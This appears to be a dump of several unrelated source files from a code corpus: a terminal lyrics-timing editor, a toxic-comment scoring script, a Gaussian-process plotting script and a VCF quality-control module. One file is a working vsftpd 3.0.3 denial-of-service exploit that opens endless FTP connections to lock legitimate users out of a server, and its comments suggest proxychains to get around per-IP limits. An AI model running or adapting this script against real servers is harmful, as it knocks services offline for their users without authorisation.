else:\n print('%s %s' % (term.reverse(str(key + 1)), entry),\n end='')\n key += 1\n else:\n print(term.move_down(), end='')\n continue\n print(term.move_down(), end='')\n print('━' * term.width)\n return self.verses[self.verse_id]\n\n\nclass Line(object):\n def __init__(self, text):\n # detect if text contains markups\n timestamps, tokens = parse_lrc(text)\n self.tokens = tokens\n self.reset([convert_to_ms(t) for t in timestamps if t])\n\n @property\n def timestamp(self):\n return self.timestamps[self.pos]\n\n @timestamp.setter\n def timestamp(self, value):\n self.timestamps[self.pos] = value\n\n @property\n def past_tokens(self):\n return self.tokens[:self.pos]\n\n @property\n def next_tokens(self):\n return self.tokens[self.pos:]\n\n def reset(self, timestamps=None):\n self.pos = 0\n if timestamps:\n self.timestamps = timestamps\n else:\n self.timestamps = [None] * len(self.tokens)\n\n def text(self, past=False, next=False):\n if past:\n return ' '.join(self.past_tokens)\n elif next:\n return ' '.join(self.next_tokens)\n else:\n return ' '.join(self.tokens)\n\n def eol(self):\n res = self.pos == len(self.tokens)\n return res\n\n\nclass MainPanel(object):\n\n def __init__(self, lines):\n self.xoff = 3\n self.lines = [Line(l) for l in lines]\n self.pos = 0\n print(term.move_down(), end='')\n self.display()\n\n @property\n def current_line(self):\n \"\"\"Get current active line\n \"\"\"\n return self.lines[self.pos]\n\n def display(self):\n \"\"\"Print remaining lines to timestamp of current verse.\n \"\"\"\n # Cleanup canvas\n with term.location():\n print(term.move_up(), end='')\n\n for line in range(len(self.lines) + 1):\n print(term.move_x(0) + term.clear_eol)\n\n with term.location():\n print(term.move_up(), end='')\n # Buffer: showing last line done\n if self.pos != 0:\n print (term.move_x(self.xoff) +\n self.lines[self.pos - 1].text())\n else:\n print('')\n for line in self.lines[self.pos:]:\n print(term.move_x(self.xoff) + line.text())\n sys.stdout.flush()\n print(term.move_x(self.xoff), end='')\n\n def next(self):\n \"\"\"Shift verse current line to next line or return False if no next\n line.\n \"\"\"\n if self.eov():\n return False\n self.pos += 1\n self.display()\n return True\n\n def eov(self):\n \"\"\"End of verse\"\"\"\n return self.pos >= len(self.lines) - 1\n\n def previous(self):\n \"\"\"Return False if we were positioned at first line already.\n \"\"\"\n if self.pos == 0:\n return False\n self.pos -= 1\n self.current_line.reset()\n self.display()\n return True\n\n def print_line(self, text, clear=False, end=''):\n \"\"\"Print line while keeping panel left offset.\n \"\"\"\n if clear:\n print(term.move_x(0), end='')\n print(term.clear_eol, end=end)\n print(term.move_x(self.xoff) + text, end='')\n\n def move_cursor(self, direction):\n \"\"\"Move cursor into direction\n \"\"\"\n print(getattr(term, 'move_' + direction), end='')\n\n def update_wait_indicator(self, wait_ms):\n \"\"\"Print status character corresponding to given waiting time\n \"\"\"\n statuses = ((5000, '-'),\n (4000, '▇'),\n (3000, '▃'),\n (2000, term.yellow('▂')),\n (1000, term.red('▁')))\n with term.location():\n for (threshold, c) in statuses:\n if wait_ms > threshold:\n print(term.move_x(0) + c, end='')\n return\n\n def play(self, _time):\n if not self.current_line.eol():\n if self.current_line.timestamp:\n wait_ms = self.current_line.timestamp - _time\n if wait_ms > 0:\n self.update_wait_indicator(wait_ms)\n return\n self.timestamp(_time, play=True)\n return self.current_line.eol()\n\n def end_line_break(self):\n \"\"\"Pause at eol before overwriting current line\n \"\"\"\n next_line_start = self.lines[self.pos + 1].timestamp\n if next_line_start:\n # Give a short hint that last word has been processed\n # before greying out the line\n gap = next_line_start - self.current_line.timestamps[-1]\n else:\n gap = 100\n\n time.sleep(max(gap, 0) / 1000)\n\n def timestamp(self, _time, play=False):\n \"\"\"Assign given timestamp to line.\n Return remaining number of tokens to timestamp in the line.\n \"\"\"\n self.current_line.timestamp = _time\n self.current_line.pos += 1\n self.print_line(self.current_line.text(), clear=True)\n\n if not self.current_line.eol():\n self.print_line(self.current_line.text(past=True) + ' ')\n print(term.underline(self.current_line.next_tokens[0]), end='')\n self.print_line(term.yellow(self.current_line.text(past=True)))\n\n sys.stdout.flush()\n eol = self.current_line.eol()\n if eol and not self.eov():\n self.end_line_break()\n return eol\n\n\nclass Editor(object):\n def __init__(self):\n self.vlc_instance = vlc.Instance()\n self.player = self.vlc_instance.media_player_new()\n\n def replay_line(self, line_text, timings):\n if timings:\n self.player.set_time(timings[-1][-1] - 2000)\n else:\n self.player.set_time(0)\n self.forward_cursor(0)\n self.player.play()\n return Line(words=line_text.split(), consumed=[], timings=[])\n\n def reflow(self, verse_id=-1):\n print(term.enter_fullscreen)\n term.clear()\n print(term.clear + term.enter_fullscreen, end='')\n self.top_pan = TopPanel()\n verse = self.verse_pan.select(verse_id)\n self.main_pan = MainPanel(verse['lines'][:])\n\n def end_verse_break(self):\n \"\"\"Pause until next verse starts and return verse lines.\n \"\"\"\n try:\n next_line = self.verse_pan.next()['lines'][0]\n except KeyError:\n next_line = None\n if next_line:\n timestamps, _ = parse_lrc(next_line)\n if any(timestamps):\n time.sleep((convert_to_ms(timestamps[0]) -\n self.main_pan.current_line.timestamps[-1]) / 1000)\n return self.main_pan.lines\n\n def split_verse(self):\n lines = self.verse_pan.select(self.verse_pan.verse_id)['lines']\n before_verse = dict(lines=lines[:self.main_pan.pos],\n key=self.verse_pan.verse_id)\n after_verse = dict(lines=lines[self.main_pan.pos:],\n key=len(self.verse_pan.verses))\n self.verse_pan.verses[self.verse_pan.verse_id] = before_verse\n self.verse_pan.verses.append(after_verse)\n return self.main_pan.lines[:self.main_pan.pos]\n\n def sync(self, audio, lyrics):\n self.player.set_media(self.vlc_instance.media_new(audio))\n timed_lines = []\n self.verse_pan = VersePanel(lyrics)\n self.reflow()\n with stderr_redirected(to=os.devnull):\n while True:\n sys.stdout.flush()\n self.player.play()\n with term.cbreak():\n val = None\n while val not in (u'q', u'Q',):\n sys.stdout.flush()\n val = term.inkey(timeout=.1)\n eol = self.main_pan.play(self.player.get_time())\n if val:\n key = unicode(val).lower()\n if val.name == 'KEY_UP':\n self.main_pan.previous()\n if val.name == 'KEY_DOWN':\n if self.main_pan.next():\n self.main_pan.pos += 1\n self.main_pan.display()\n elif val.name == 'KEY_SRIGHT':\n pass\n elif key == u' ':\n eol = self.main_pan.\\\n timestamp(max(0, self.player.get_time() -\n SHIFT_DELAY_MS))\n elif key == u'x':\n timed_lines.append(self.split_verse())\n self.reflow()\n else:\n # Num key shortcut to jump to verse\n if val in [unicode(x['key']) for x in\n self.verse_pan.verses]:\n self.reflow(int(val) - 1)\n\n # Move to next line\n if eol and not self.main_pan.next():\n timed_lines.append(self.end_verse_break())\n self.reflow()\n break\n else:\n break\n print(term.clear())\n return self.build_lrc(timed_lines)\n\n def build_lrc(self, timed_lines):\n lrc_lines = []\n for verse in timed_lines:\n for line in verse:\n lrc_toks = []\n for (tok, tstamp) in zip(line.tokens, line.timestamps):\n lrc_toks.append('[%s]%s' %\n (str(timedelta(milliseconds=tstamp))[2:-4],\n tok.strip()))\n lrc_lines.append(' '.join(lrc_toks))\n lrc_lines.append('')\n return '\\n'.join(lrc_lines)\n","sub_path":"keroaek/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":14757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"334012204","text":"# Exploit Title: vsftpd 3.0.3 - Remote Denial of Service\r\n# Date: 22-03-2021\r\n# Exploit Author: xynmaps\r\n# Vendor Homepage: https://security.appspot.com/vsftpd.html\r\n# Software Link: https://security.appspot.com/downloads/vsftpd-3.0.3.tar.gz\r\n# Version: 3.0.3\r\n# Tested on: Parrot Security OS 5.9.0\r\n\r\n#-------------------------------#\r\n\r\n#encoding=utf8\r\n#__author__ = XYN/Dump/NSKB3\r\n#VSFTPD Denial of Service exploit by XYN/Dump/NSKB3.\r\n\"\"\"\r\nVSFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,\r\nyou can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.\r\n(if it's limited, just run this script from different proxies using proxychains, and it will work)\r\n\"\"\"\r\n\r\nimport socket\r\nimport sys\r\nimport threading\r\nimport subprocess\r\nimport time\r\n\r\nbanner = \"\"\"\r\n._________________.\r\n| VS-FTPD |\r\n| D o S |\r\n|_________________|\r\n|By XYN/DUMP/NSKB3|\r\n|_|_____________|_|\r\n|_|_|_|_____|_|_|_|\r\n|_|_|_|_|_|_|_|_|_|\r\n\r\n\"\"\"\r\nusage = \"{} \".format(sys.argv[0])\r\n\r\ndef test(t,p):\r\n\ts = socket.socket()\r\n\ts.settimeout(10)\r\n\ttry:\r\n\t\ts.connect((t, p))\r\n\t\tresponse = s.recv(65535)\r\n\t\ts.close()\r\n\t\treturn 0\r\n\texcept socket.error:\r\n\t\tprint(\"Port {} is not open, please specify a port that is open.\".format(p))\r\n\t\tsys.exit()\r\ndef attack(targ, po, id):\r\n\ttry:\r\n\t\tsubprocess.Popen(\"ftp {0} {1}\".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n\t\t#print(\"Worker {} running\".format(id))\r\n\texcept OSError: pass\r\ndef main():\r\n\tglobal target, port, start\r\n\tprint(banner)\r\n\ttry:\r\n\t\ttarget = sys.argv[1]\r\n\texcept:\r\n\t\tprint(usage)\r\n\t\tsys.exit()\r\n\ttry:\r\n\t\tport = int(sys.argv[2])\r\n\texcept:\r\n\t\tport = 21\r\n\ttry:\r\n\t\tconns = int(sys.argv[3])\r\n\texcept:\r\n\t\tconns = 50\r\n\tprint(\"[!] Testing if {0}:{1} is open\".format(target, port))\r\n\ttest(target, port)\r\n\tprint(\"[+] Port {} open, starting attack...\".format(port))\r\n\ttime.sleep(2)\r\n\tprint(\"[+] Attack started on {0}:{1}!\".format(target, port))\r\n\tdef loop(target, port, conns):\r\n\t\tglobal start\r\n\t\tthreading.Thread(target=timer).start()\r\n\t\twhile 1:\r\n\t\t\tfor i in range(1, conns + 3):\r\n\t\t\t\tt = threading.Thread(target=attack, args=(target,port,i,))\r\n\t\t\t\tt.start()\r\n\t\t\t\tif i > conns + 2:\r\n\t\t\t\t\tt.join()\r\n\t\t\t\t\tbreak\r\n\t\t\t\t\tloop()\r\n\r\n\tt = threading.Thread(target=loop, args=(target, port, conns,))\r\n\tt.start()\r\n\r\ndef timer():\r\n start = time.time()\r\n while 1:\r\n if start < time.time() + float(900): pass\r\n else:\r\n subprocess.Popen(\"pkill ftp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n t = threading.Thread(target=loop, args=(target, port,))\r\n t.start()\r\n break\r\n\r\nmain()\r\n","sub_path":"agent_sudo/49719.py","file_name":"49719.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"26130769","text":"import os\nimport requests\nimport json\nimport time\n\nimport pandas as pd\n\nfrom sklearn.metrics import roc_auc_score\n\nfrom preprocess import normalize_text\nfrom cache import get_data, is_in_cache, load_cache, save_in_cache\nfrom utils import print_step\n\n\nCONVAI_KEY = os.environ['CONVAI_KEY']\n\n\ntrain, test = get_data()\ntrain['is_train'] = 1\ntest['is_train'] = 0\nmerge = pd.concat([train.reset_index(), test.reset_index()]).drop('index', axis=1)\n\n\ndef run_query(comment_text, idx):\n value = normalize_text(comment_text)\n value = value[:2999] if len(value) >= 3000 else value\n value = 'empty' if len(value) == 0 else value\n try:\n rr = requests.post('https://commentanalyzer.googleapis.com/v1alpha1/comments:analyze', params={'key': CONVAI_KEY}, data=json.dumps({'comment': {'text': value}, 'languages': ['en'], 'requestedAttributes': {'TOXICITY': {}, 'ATTACK_ON_AUTHOR': {}, 'ATTACK_ON_COMMENTER': {}, 'INCOHERENT': {}, 'INFLAMMATORY': {}, 'LIKELY_TO_REJECT': {}, 'OBSCENE': {}, 'SEVERE_TOXICITY': {}, 'SPAM': {}, 'UNSUBSTANTIAL': {}}}))\n return [(k, v['summaryScore']['value']) for k, v in rr.json()['attributeScores'].items()] + [('id', idx)]\n except Exception as error:\n print_step('FATAL ABORT:')\n import pdb\n pdb.set_trace()\n\n\ndef run_query_in_batches(df, label=''):\n responses = []\n total = len(df.comment_text.values)\n i = 0\n while i <= total:\n skip = False\n if i % 500 == 0 or i == total:\n batch_num = str(i / 500 + 1)\n if is_in_cache('convai-batches-' + label + batch_num):\n print_step('BATCH ' + label + batch_num + ' ALREADY DONE...')\n i += 500\n skip = True\n elif len(responses) > 100:\n batch_num = str(i / 500)\n if i == total:\n batch_num = str(int(batch_num) + 1)\n skip = True\n print_step('COLLECTING BATCH ' + label + batch_num + ' / ' + str(round(total / 500) + 1))\n batch_df = pd.DataFrame([dict(x) for x in responses])\n save_in_cache('convai-batches-' + label + batch_num, batch_df, None)\n batch_num = str(i / 500 + 1)\n print_step('SLEEPING 60s')\n time.sleep(60)\n responses = []\n print_step('STARTING BATCH ' + label + batch_num)\n else:\n print_step('STARTING BATCH ' + label + batch_num)\n if not skip:\n print_step(str(i + 1) + ' / ' + str(total))\n responses.append(run_query(df.comment_text.values[i], df.id.values[i]))\n i += 1\n\nrun_query_in_batches(merge)\n\ndfs = []\nfor i in range(1, 627):\n df = pd.read_csv('cache/train_convai-batches-' + str(i) + '.csv')\n df['batch_num'] = i\n dfs.append(df)\n\ndf = pd.concat(dfs)\nmerge2 = pd.merge(df.reset_index(), merge.reset_index(), on='id').drop(['index_x', 'index_y'], axis=1)\nprint('DUPLICATION CHECK')\nprint(merge2.duplicated('id').value_counts())\nprint('TOXIC AUC:' + str(roc_auc_score(merge2[merge2['is_train'] == 1]['toxic'], merge2[merge2['is_train'] == 1]['TOXICITY'])))\nprint('SEVTOX AUC: ' + str(roc_auc_score(merge2[merge2['is_train'] == 1]['severe_toxic'], merge2[merge2['is_train'] == 1]['SEVERE_TOXICITY'])))\nprint('OBSCENE AUC: ' + str(roc_auc_score(merge2[merge2['is_train'] == 1]['obscene'], merge2[merge2['is_train'] == 1]['TOXICITY'])))\nprint('THREAT AUC: ' + str(roc_auc_score(merge2[merge2['is_train'] == 1]['threat'], merge2[merge2['is_train'] == 1]['SEVERE_TOXICITY'])))\nprint('INSULT AUC: ' + str(roc_auc_score(merge2[merge2['is_train'] == 1]['insult'], merge2[merge2['is_train'] == 1]['TOXICITY'])))\nprint('IDENTITY HATE AUC: ' + str(roc_auc_score(merge2[merge2['is_train'] == 1]['identity_hate'], merge2[merge2['is_train'] == 1]['SEVERE_TOXICITY'])))\n\nmissing_ids = set(merge['id'].values) - set(merge2['id'].values)\nprint('# MISSING IDS: ' + str(len(missing_ids)))\nmissing_df = merge[merge['id'].apply(lambda x: x in missing_ids)]\nimport pdb\npdb.set_trace()\n# extra_df = pd.DataFrame(dict(run_query(missing_df.comment_text.values[0], missing_df.id.values[0])), index=[1])\n# df2 = pd.concat([df, extra_df])\n# merge2 = pd.merge(df2.reset_index(), merge.reset_index(), on='id').drop(['index_x', 'index_y'], axis=1)\n\nprint('~~~~~~~~~~~')\nprint_step('Saving')\ntrain2 = merge2[merge2['is_train'] == 1]\ntest2 = merge2[merge2['is_train'] == 0]\ntrain2.drop(['comment_text', 'batch_num', 'is_train'], axis=1, inplace=True)\ntest2.drop(['comment_text', 'batch_num', 'is_train'], axis=1, inplace=True)\nprint('TOXIC AUC RECHECK: ' + str(roc_auc_score(train2['toxic'], train2['TOXICITY'])))\nprint('SEVTOX AUC RECHECK: ' + str(roc_auc_score(train2['severe_toxic'], train2['SEVERE_TOXICITY'])))\nprint('OBSCENE AUC RECHECK: ' + str(roc_auc_score(train2['obscene'], train2['TOXICITY'])))\nprint('THREAT AUC RECHECK: ' + str(roc_auc_score(train2['threat'], train2['SEVERE_TOXICITY'])))\nprint('INSULT AUC RECHECK: ' + str(roc_auc_score(train2['insult'], train2['TOXICITY'])))\nprint('IHATE AUC RECHECK: ' + str(roc_auc_score(train2['identity_hate'], train2['SEVERE_TOXICITY'])))\nsave_in_cache('convai_data', train2, test2)\n\nprint('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')\nprint_step('Prepping submission file')\nsubmission = pd.DataFrame()\nsubmission['id'] = test2['id']\nsubmission['toxic'] = test2['TOXICITY']\nsubmission['severe_toxic'] = test2['SEVERE_TOXICITY']\nsubmission['obscene'] = test2['TOXICITY']\nsubmission['threat'] = test2['SEVERE_TOXICITY']\nsubmission['insult'] = test2['TOXICITY']\nsubmission['identity_hate'] = test2['SEVERE_TOXICITY']\nsubmission.to_csv('submit/submit_convai.csv', index=False)\nprint_step('Done!')\n","sub_path":"AML/codes/Asta/kaggle-toxic_comment-master/conversationai_api.py","file_name":"conversationai_api.py","file_ext":"py","file_size_in_byte":5694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"47121876","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nsys.path.append(\"../\")\n\nfrom kernel import InverseMultiquadricKernelPytouch\nfrom mtgp import GaussianProcessImplicitSurfaces\n\n\nimport numpy as np\nimport torch\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as pat\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nimport time\nimport pickle\n\nplt.style.use('ggplot')\ncolor_cycle = list(plt.rcParams['axes.prop_cycle'].by_key()['color'])\n\n# hyper parameter\nalpha = 0.01\nkernel_param = 0.1\nrate = 0.01\nmax_iter = 1000\nlr = 0.0001\nsigma = torch.tensor(-5.168)\n\n\nplot = True\n# plot = False\nsave_data = True\nsave_data = False\nsave_movie = True\n# save_movie = False\n\n\n\ndef set_plt():\n plt.xlim(0, 0.6)\n plt.ylim(0, 0.6)\n plt.xticks(color=\"None\")\n plt.yticks(color=\"None\")\n plt.tick_params(length=0)\n plt.gca().spines['right'].set_visible(False)\n plt.gca().spines['left'].set_visible(False)\n plt.gca().spines['top'].set_visible(False)\n plt.gca().spines['bottom'].set_visible(False)\n plt.axes().set_aspect('equal', 'datalim')\n\nif __name__==\"__main__\":\n # current_po = np.array([0.4, 0.55])\n current_po = np.array([0.3, 0.5]) # high high\n current_po = np.array([0.3, 0.55]) # low low\n current_po = np.array([0.3, 0.55]) # high low\n current_po = np.array([0.25, 0.55]) # low high\n current_po = np.array([0.4, 0.55]) # deco\n\n po_list = np.array([current_po])\n\n # visual data\n N1 = 10\n x1_0 = (np.concatenate([np.linspace(10, 50, N1), np.ones(N1)*50, np.linspace(50, 10, N1), np.ones(N1)*10]) ) * rate\n x1_1 = (np.concatenate([np.linspace(8, 52, N1), np.ones(N1)*52, np.linspace(52, 8, N1), np.ones(N1)*8]) ) * rate\n x1 = np.concatenate([x1_0, x1_1])[:, None]\n\n y1_0 = (np.concatenate([np.ones(N1)*10, np.linspace(10, 50, N1), np.ones(N1)*50, np.linspace(50, 10, N1)]) ) * rate\n y1_1 = (np.concatenate([np.ones(N1)*8, np.linspace(8, 52, N1), np.ones(N1)*52, np.linspace(52, 8, N1)]) ) * rate\n y1 = np.concatenate([y1_0, y1_1])[:, None]\n\n X1 = np.concatenate([x1,y1],1)\n Y1 = np.concatenate([np.zeros(len(x1_0)), np.ones(len(x1_1)) ])[:, None]\n T1 = 0\n\n # true object\n N2 = 10\n x2_0 = np.concatenate([np.ones(N2)*15, np.linspace(15, 25, N2//2), np.ones(N2)*25, np.linspace(25, 35, N2), np.ones(N2)*35, np.linspace(35, 45, N2//2), np.ones(N2)*45, np.linspace(45, 15, N2)]) * rate\n y2_0 = np.concatenate([np.linspace(15, 45, N2), np.ones(N2//2)*45, np.linspace(45, 30, N2), np.ones(N2)*30, np.linspace(30, 45, N2), np.ones(N2//2)*45, np.linspace(45, 15, N2), np.ones(N2)*15]) * rate\n\n # test data\n x = np.linspace(0, 60, 800)[:, None] * rate\n y = np.linspace(0, 60, 800)[:, None] * rate\n # x = np.linspace(0, 60, 200)[:, None] * rate\n # y = np.linspace(0, 60, 200)[:, None] * rate\n x,y = np.meshgrid(x, y)\n xx = x.ravel()[:, None]\n yy = y.ravel()[:, None]\n XX = np.concatenate([xx, yy], 1)\n XX = torch.from_numpy(XX).float()\n\n fig = plt.figure(figsize=(3.0, 3.0), dpi=300)\n ax = fig.add_subplot(111)\n\n\n kernel = InverseMultiquadricKernelPytouch([kernel_param])\n\n\n X1_t = torch.from_numpy(X1).float()\n Y1_t = torch.from_numpy(Y1).float()\n\n gp_model = GaussianProcessImplicitSurfaces(X1_t, Y1_t, kernel, sigma=sigma)\n\n mm2, ss2 = gp_model.predict(XX)\n mean_zero = np.where(abs(mm2.T[0]) < 0.03)\n surf_x = xx.T[0][mean_zero]\n surf_y = yy.T[0][mean_zero]\n var = np.array(ss2.T[0][mean_zero])\n\n\n\n ss2 = ss2.reshape(x.shape)\n z = ss2.numpy()\n xyz = plt.pcolormesh(x, y, z, cmap=cm.Purples, vmax=z.max(), vmin=z.min())\n\n outer = pat.Rectangle(xy = (0.1, 0.1), width = 0.4, height = 0.4,linewidth=2, linestyle='dashdot', ec=color_cycle[5], fill=False)\n ax.add_patch(outer)\n\n rec2 = pat.Rectangle(xy = (0.15, 0.15), width = 0.1, height = 0.3, color=color_cycle[5])\n rec3 = pat.Rectangle(xy = (0.25, 0.15), width = 0.1, height = 0.15, color=color_cycle[5])\n rec4 = pat.Rectangle(xy = (0.35, 0.15), width = 0.1, height = 0.3, color=color_cycle[5])\n\n ax.add_patch(rec2)\n ax.add_patch(rec3)\n ax.add_patch(rec4)\n\n plt.plot(po_list[:, 0], po_list[:, 1], '--', color='black', linewidth=2, zorder=9)\n plt.scatter(po_list[-1, 0], po_list[-1, 1], c='black', s=20, marker=\"o\",zorder=10)\n plt.scatter(surf_x, surf_y, s=3, c=color_cycle[0], zorder=8)\n set_plt()\n\n # plt.scatter(X2[:,0], X2[:,1])\n set_plt()\n plt.savefig('decoboco_initial.png', dpi=300, pad_inches=0.05)\n plt.show()\n\n","sub_path":"mtgpis_simulation/lib/create_initial_estimate_shape.py","file_name":"create_initial_estimate_shape.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"591569527","text":"import shutil\nfrom os import mkdir, makedirs\nfrom os.path import basename, join, isdir, dirname\n\nfrom src.utils import file_exists\nfrom src.my_utils import info, err, verify_file, step_greetings, \\\n get_tool_cmdline, get_java_tool_cmdline, call, verify_dir, critical\n\n\ndef check_quality_control_config(cnf):\n qc_cnf = cnf.get('quality_control')\n if not qc_cnf:\n return\n\n if 'databases' not in qc_cnf:\n qc_cnf['databases'] = ['dbsnp']\n info('Warning: not databases for quality control, using [dbsnp]')\n\n if 'novelty' not in qc_cnf:\n qc_cnf['novelty'] = ['all', 'known', 'novel']\n info('Warning: no novelty specified for quality control, '\n 'using default ' + ', '.join(qc_cnf['novelty']))\n\n if 'metrics' not in qc_cnf:\n qc_cnf['metircs'] = [\n 'nEvalVariants', 'nSNPs', 'nInsertions', 'nDeletions',\n 'nVariantsAtComp', 'compRate', 'nConcordant', 'concordantRate',\n 'variantRate', 'variantRatePerBp', 'hetHomRatio', 'tiTvRatio']\n info('Warning: no metrics for quality control, using '\n 'default ' + ', '.join(qc_cnf['metircs']))\n\n to_exit = False\n dbs_dict = {}\n for db in qc_cnf['databases']:\n if not db:\n err('Empty field for quality_control databases')\n to_exit = True\n elif file_exists(db):\n if not verify_file(db, 'Vcf'):\n to_exit = True\n dbs_dict[basename(db)] = db\n elif db not in cnf['genome']:\n to_exit = True\n err(cnf.get('log'), db + ' for variant qc is not found '\n 'in genome resources in system config.')\n else:\n dbs_dict[db] = cnf['genome'][db]\n\n if to_exit:\n exit()\n\n qc_cnf['database_vcfs'] = dbs_dict\n\n if 'summary_output' in qc_cnf or 'qc_summary_output' in cnf:\n qc_output_fpath = qc_cnf.get('summary_output') or cnf.get('qc_summary_output')\n summary_output_dir = dirname(qc_output_fpath)\n if not isdir(summary_output_dir):\n try:\n makedirs(summary_output_dir)\n except OSError:\n critical('ERROR: cannot create directory for '\n 'qc summary report: ' + summary_output_dir)\n if not verify_dir(summary_output_dir, 'qc_summary_output'):\n exit()\n\n\ndef quality_control(cnf, qc_dir, vcf_fpath):\n if 'quality_control' not in cnf:\n return None, None\n\n if not isdir(qc_dir):\n mkdir(qc_dir)\n\n qc_report_fpath = gatk_qc(cnf, qc_dir, vcf_fpath)\n qc_plots_fpaths = bcftools_qc(cnf, qc_dir, vcf_fpath)\n return qc_report_fpath, qc_plots_fpaths\n\n\ndef gatk_qc(cnf, qc_dir, vcf_fpath):\n step_greetings(cnf, 'Quality control reports')\n\n log = cnf['log']\n work_dir = cnf['work_dir']\n\n qc_cnf = cnf['quality_control']\n databases = qc_cnf.get('database_vcfs')\n novelty = qc_cnf.get('novelty')\n metrics = qc_cnf.get('metrics')\n\n executable = get_java_tool_cmdline(cnf, 'gatk')\n gatk_opts_line = ' '.join(cnf.get('gatk', {'options': []}).get('options', []))\n ref_fpath = cnf['genome']['seq']\n report_fpath = join(work_dir, cnf['name'] + '_gatk.report')\n\n cmdline = ('{executable} {gatk_opts_line} -R {ref_fpath} -T VariantEval'\n ' --eval:tmp {vcf_fpath} -o {report_fpath}').format(**locals())\n\n if 'dbsnp' in databases:\n cmdline += ' -D ' + databases['dbsnp']\n for db_name, db_path in databases.items():\n if not db_name == 'dbsnp':\n cmdline += ' -comp:' + db_name + ' ' + db_path\n\n call(cnf, cmdline, None, report_fpath, stdout_to_outputfile=False,\n to_remove=[vcf_fpath + '.idx'])\n\n report = _parse_gatk_report(report_fpath, databases.keys(), novelty, metrics)\n\n final_report_fpath = join(qc_dir, cnf['name'] + '_qc.report')\n\n _make_final_report(report, final_report_fpath, cnf['name'],\n databases.keys(), novelty, metrics)\n return final_report_fpath\n\n\ndef bcftools_qc(cnf, qc_dir, vcf_fpath):\n step_greetings(cnf, 'Quality control plots')\n\n work_dir = cnf['work_dir']\n\n bgzip = get_tool_cmdline(cnf, 'bgzip')\n tabix = get_tool_cmdline(cnf, 'tabix')\n bcftools = get_tool_cmdline(cnf, 'bcftools')\n plot_vcfstats = get_tool_cmdline(cnf, 'plot_vcfstats')\n if not bcftools or not tabix or not bcftools or not plot_vcfstats:\n exit()\n\n gzipped_fpath = join(work_dir, basename(vcf_fpath) + '.gz')\n cmdline = '{bgzip} -c {vcf_fpath}'.format(**locals())\n call(cnf, cmdline, None, gzipped_fpath)\n\n tbi_fpath = gzipped_fpath + '.tbi'\n cmdline = '{tabix} -f -p vcf {gzipped_fpath}'.format(**locals())\n call(cnf, cmdline, None, tbi_fpath)\n\n text_report_fpath = join(work_dir, cnf['name'] + '_bcftools.report')\n cmdline = '{bcftools} stats {gzipped_fpath}'.format(**locals())\n call(cnf, cmdline, None, text_report_fpath, to_remove=[gzipped_fpath, tbi_fpath])\n\n viz_report_dir = join(work_dir, cnf['name'] + '_qc_plots/')\n if file_exists(viz_report_dir):\n shutil.rmtree(viz_report_dir)\n mkdir(viz_report_dir)\n cmdline = '{plot_vcfstats} -s {text_report_fpath} -p {viz_report_dir} ' \\\n '--no-PDF'.format(**locals())\n call(cnf, cmdline, text_report_fpath, None, output_is_file=False)\n return _get_plots_from_bcftools(cnf, viz_report_dir, qc_dir)\n\n\ndef _parse_gatk_report(report_filename, databases, novelty, metrics):\n database_col_name = 'CompRod'\n database_col_id = None\n novelty_col_name = 'Novelty'\n novelty_col_id = None\n\n report = dict()\n comments_section = False\n cur_header = []\n cur_metrics_ids = []\n for line in open(report_filename):\n if not line.strip():\n continue\n if line.startswith('#'): # comment line\n comments_section = True\n continue\n elif comments_section:\n comments_section = False\n cur_header = line.split()\n cur_metrics_ids = []\n database_col_id = cur_header.index(database_col_name)\n novelty_col_id = cur_header.index(novelty_col_name)\n for metric in metrics:\n if metric in cur_header:\n cur_metrics_ids.append(cur_header.index(metric))\n if metric not in report:\n report[metric] = dict()\n elif cur_metrics_ids: # process lines only if there are metrics in current section\n values = line.split()\n cur_database = values[database_col_id]\n cur_novelty = values[novelty_col_id]\n if (cur_database not in databases) or (cur_novelty not in novelty):\n continue\n for metric_id in cur_metrics_ids:\n if cur_database not in report[cur_header[metric_id]]:\n report[cur_header[metric_id]][cur_database] = dict()\n report[cur_header[metric_id]][cur_database][cur_novelty] = values[metric_id]\n return report\n\n\ndef _make_final_report(report_dict, report_filename, sample_name,\n databases, novelty, metrics):\n header = ['Metric', 'Novelty'] + databases + ['Average']\n full_report = [header]\n for cur_metric in metrics:\n for cur_novelty in novelty:\n cur_row = [cur_metric, cur_novelty]\n sum = 0.0\n for cur_database in databases:\n if cur_metric == 'variantRatePerBp': # confusing name and value format\n cur_row[0] = 'basesPerVariant'\n cur_row.append(\"%.2f\" % float(report_dict[cur_metric][cur_database][cur_novelty]))\n else:\n cur_row.append(report_dict[cur_metric][cur_database][cur_novelty])\n sum += float(cur_row[-1])\n average = sum / len(databases)\n cur_row.append(\"%.2f\" % average)\n full_report.append(cur_row)\n\n col_widths = [0] * len(header)\n for row in full_report:\n for id, value in enumerate(row):\n col_widths[id] = max(len(value), col_widths[id])\n\n out = open(report_filename, 'w')\n out.write('Sample name: ' + sample_name + '\\n\\n')\n for row in full_report:\n out.write(' '.join('%-*s' % (col_width, value) for col_width, value\n in zip(col_widths, row)) + \"\\r\\n\")\n out.close()\n\n\ndef _get_plots_from_bcftools(cnf, bcftools_report_dir, output_dir):\n original_plots_names = ['indels.0.png', 'substitutions.0.png']\n final_plots_names = [cnf['name'] + '_indels.png', cnf['name'] + '_substitution.png']\n for i, original_plot in enumerate(original_plots_names):\n plot_src_filename = join(bcftools_report_dir, original_plot)\n plot_dst_filename = join(output_dir, final_plots_names[i])\n if file_exists(plot_src_filename):\n shutil.copyfile(plot_src_filename, plot_dst_filename)\n return [join(output_dir, fname) for fname in 